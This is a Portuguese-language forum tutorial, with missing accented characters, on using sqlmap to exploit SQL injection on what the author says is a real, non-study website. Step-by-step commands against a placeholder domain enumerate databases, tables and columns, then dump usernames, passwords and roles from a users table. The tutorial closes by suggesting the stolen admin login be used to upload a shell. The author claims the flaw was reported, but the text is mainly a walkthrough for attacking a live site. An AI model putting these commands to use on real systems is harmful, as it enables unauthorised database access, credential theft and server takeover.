Os comandos ou parmetros listados nesse tutorial so encontrados no:

Cdigo:

./sqlmap.py h

Onde sero listados diferentes parmetros interessantssimos!

Um pouco sobre a ferramenta Sqlmap.

Sqlmap uma ferramenta open source para penetration test que automatiza o
processo de deteco e exploiting de vulnerabilidades a Sqli Injection, escrita
em python e tem suporte tanto GNU linux ou windows. O sqlmap alm de
oferecer as funes para detectar e explorar as vulnerabilidades a SQLI, ele
consegue tambm tentar dominar o sistema de banco de dados se for
possivel.

Bom vamos aos estudos.

Irei usar o sqlmap em um site que no foi criado para fins estudantis.
Citao:

Lembrando que este site ao qual obtive tais informaes foi comunicado ao admistrador e
ao webmaster sobre vulnerabilidade para poder ser corrigida.

Cdigo:

./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -b

Onde:

--url = URL do site

-b = Pega o banner do DBMS (Database Management System, sistema
gerenciador de banco de dados.)
Cdigo:

./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" --current-db

Onde:

--current-db = Mostra o banco de dados que esta sendo usado

Mas para verificar todos os bancos de dados existentes:

Cdigo:

./sqlmap.py --url " http://sitealvo.com.br/produto.php?time=6" --dbs

Onde:

--dbs = lista todos os bancos de dados de DBMS.

Esta imagem foi redimensionada. Clique nesta barra para ver a imagem completa. A imagem
original de tamanho 802x602.

Depois de obter os bancos de dados agora j podemos listar as tabelas.

Cdigo:

./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -D imopmarn_casa --tables

Onde:

-D = Banco de dados alvo. (neste caso o banco de dados alvo

imopmarn_casas)
--tables = listar tabelas.

Esta imagem foi redimensionada. Clique nesta barra para ver a imagem completa. A imagem
original de tamanho 805x604.
Obs: Houve um erro nessa preview o correto das tabelas so:
Citao:

badad.........=....fotos
badadbe.....=....peruibe
badadees....=....clientes
badades......=....cidades
badadis.......=....imoveis
bairros........=....bairros
basarios......=....usuarios
bastros.......=....rastros

importante sempre indicar o banco de dados alvo (-D) antes de listar as

tabelas pois caso no faa isso (sem o D) ele ir listar todas as tabelas de
todos os bancos de dados.

Aps ter conseguido achar as tabelas vamos ento listar as colunas.

Cdigo:

./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -D imopmarn_casa T usurios

--columns

-T = Tabela alvo
--columns = Listar colunas.
Agora j com as tabelas e colunas listadas pode-se obter informaes
importantes do site alvo a partir das colunas que nos foi dada com:
Cdigo:

./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -D imopmarn_casa T usuarios

C usuario,senha,funcao --dump

Onde:

-T = tabela alvo
-C = Colunas alvo, ou seja pode ser mais de uma coluna a ser escolhida. Ex:
usuario,senha (sempre separados por virgula e abrindo e fechando com aspas
simples ).
--dump = obter, extrair dados (dumpeado dados).

Bom depois de extrados os dados de usurio(adm) e senha do site alvo pode-

se fazer o upload de uma shell.

Agradecimentos:
samukt e papaismurf